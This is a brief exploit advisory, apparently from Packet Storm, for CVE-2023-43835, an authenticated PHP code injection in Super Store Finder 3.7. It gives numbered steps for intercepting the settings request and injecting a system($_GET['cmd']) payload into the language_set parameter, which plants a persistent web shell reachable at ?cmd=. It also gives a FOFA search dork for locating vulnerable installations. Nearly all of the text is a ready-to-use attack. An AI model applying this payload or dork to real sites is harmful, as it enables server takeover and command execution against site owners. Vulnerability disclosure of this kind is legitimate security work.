CVE-2023-43835: Super Store Finder 3.7 Remote Command Execution ≈ Packet Storm

# Vulnerability : Authenticated Arbitrary PHP Code Injection lead to RemoteCode Execution# Researcher : Etharus# Vendor : Joe Iz, https://www.superstorefinder.net/# Demo Url : https://superstorefinder.net/products/superstorefinder/# Version Affected : 3.7 and below# Date : 18 September 2023# FOFA Dork : "designed and built by Joe Iz."# Step 1 : Login as user/admin# Step 2 : Go to Settings on right top# Step 3 : Turn on proxy to intercept request and save the settings# Step 4 : On language_set parameter set the value to  en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);//# Step 5 : Due to index.php called config.inc.php , we just can go for rcewith parameter ?cmd=# Step 6 : Example. http://localhost/?cmd=uname%20-a